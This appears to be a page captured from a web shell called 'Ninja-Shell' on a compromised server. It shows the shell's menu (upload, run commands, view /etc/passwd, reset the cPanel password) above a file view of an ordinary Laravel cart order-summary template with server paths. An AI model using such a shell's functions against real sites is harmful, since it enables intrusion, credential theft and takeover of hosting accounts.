{Ninja-Shell}
Home
Info
Upload
Command
View /etc/passwd
cPanel Reset Password
Filename: ///var/www/arsu//storage/framework//views/b6276b28f2cd77c6ebf118a89ff46754168cc2f5.php
<div class="tp-cart-checkout-wrapper"> <?php ($shippingMethod=\App\CPU\Helpers::get_business_settings('shipping_method')); ?> <?php ($sub_total=0); ?> <?php ($total_tax=0); ?> <?php ($total_shipping_cost=0); ?> <?php ($order_wise_shipping_discount=\App\CPU\CartManager::order_wise_shipping_discount()); ?> <?php ($total_discount_on_product=0); ?> <?php ($cart=\App\CPU\CartManager::get_cart()); ?> <?php ($cart_group_ids=\App\CPU\CartManager::get_cart_group_ids()); ?> <?php ($shipping_cost=\App\CPU\CartManager::get_shipping_cost()); ?> <?php if($cart->count() > 0): ?> <?php $__currentLoopData = $cart; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $cartItem): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <?php ($sub_total+=$cartItem['price']*$cartItem['quantity']); ?> <?php ($total_tax+=$cartItem['tax_model']=='exclude' ? ($cartItem['tax']*$cartItem['quantity']):0); ?> <?php ($total_discount_on_product+=$cartItem['discount']*$cartItem['quantity']); ?> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> <?php ($total_shipping_cost=$shipping_cost); ?> <?php else: ?> <span><?php echo e(\App\CPU\translate('empty_cart')); ?></span> <?php endif; ?> <div class="tp-cart-checkout-top mb-5 pb-0 d-flex align-items-center justify-content-between border-0"> <span class="tp-cart-checkout-top-title"><?php echo e(\App\CPU\translate('sub_total')); ?></span> <span class="tp-cart-checkout-top-price"><?php echo e(\App\CPU\Helpers::currency_converter($sub_total)); ?></span> </div> <div class="tp-cart-checkout-top mb-5 pb-0 d-flex align-items-center justify-content-between border-0"> <span class="tp-cart-checkout-top-title"><?php echo e(\App\CPU\translate('tax')); ?></span> <span class="tp-cart-checkout-top-price"><?php echo e(\App\CPU\Helpers::currency_converter($total_tax)); ?></span> </div> <div class="tp-cart-checkout-top mb-5 pb-0 d-flex align-items-center justify-content-between border-0"> <span class="tp-cart-checkout-top-title"><?php echo e(\App\CPU\translate('shipping')); ?></span> <span class="tp-cart-checkout-top-price"><?php echo e(\App\CPU\Helpers::currency_converter($total_shipping_cost)); ?></span> </div> <div class="tp-cart-checkout-top mb-5 pb-0 d-flex align-items-center justify-content-between border-0"> <span class="tp-cart-checkout-top-title"><?php echo e(\App\CPU\translate('discount_on_product')); ?></span> <span class="tp-cart-checkout-top-price">- <?php echo e(\App\CPU\Helpers::currency_converter($total_discount_on_product)); ?></span> </div> <?php if(session()->has('coupon_discount')): ?> <?php ($coupon_discount = session()->has('coupon_discount')?session('coupon_discount'):0); ?> <div class="tp-cart-checkout-top mb-5 pb-0 d-flex align-items-center justify-content-between border-0"> <span class="tp-cart-checkout-top-title"><?php echo e(\App\CPU\translate('coupon_discount')); ?></span> <span class="tp-cart-checkout-top-price" id="coupon-discount-amount">- <?php echo e(\App\CPU\Helpers::currency_converter($coupon_discount+$order_wise_shipping_discount)); ?></span> </div> <?php ($coupon_dis=session('coupon_discount')); ?> <?php else: ?> <div class="tp-cart-checkout-shipping pt-2"> <h4 class="tp-cart-checkout-shipping-title"><?php echo e(\App\CPU\translate('Coupon code')); ?>:</h4> <div class="tp-cart-coupon"> <form class="needs-validation" action="javascript:" method="post" novalidate id="coupon-code-ajax"> <div class="tp-cart-coupon-input-box"> <div class="tp-cart-coupon-input d-flex align-items-center"> <input type="text" name="code" placeholder="<?php echo e(\App\CPU\translate('Coupon code')); ?>" required> <div class="invalid-feedback"><?php echo e(\App\CPU\translate('please_provide_coupon_code')); ?></div> <button type="button" onclick="couponCode()"><?php echo e(\App\CPU\translate('Apply')); ?></button> </div> </div> </form> </div> </div> <?php ($coupon_dis=0); ?> <?php endif; ?> <div class="tp-cart-checkout-total d-flex align-items-center justify-content-between"> <span><?php echo e(\App\CPU\translate('total')); ?></span> <span><?php echo e(\App\CPU\Helpers::currency_converter($sub_total+$total_tax+$total_shipping_cost-$coupon_dis-$total_discount_on_product-$order_wise_shipping_discount)); ?></span> </div> </div> <?php /**PATH /var/www/arsu/resources/themes/default/web-views/partials/_order-summary.blade.php ENDPATH**/ ?>
./Ninja\.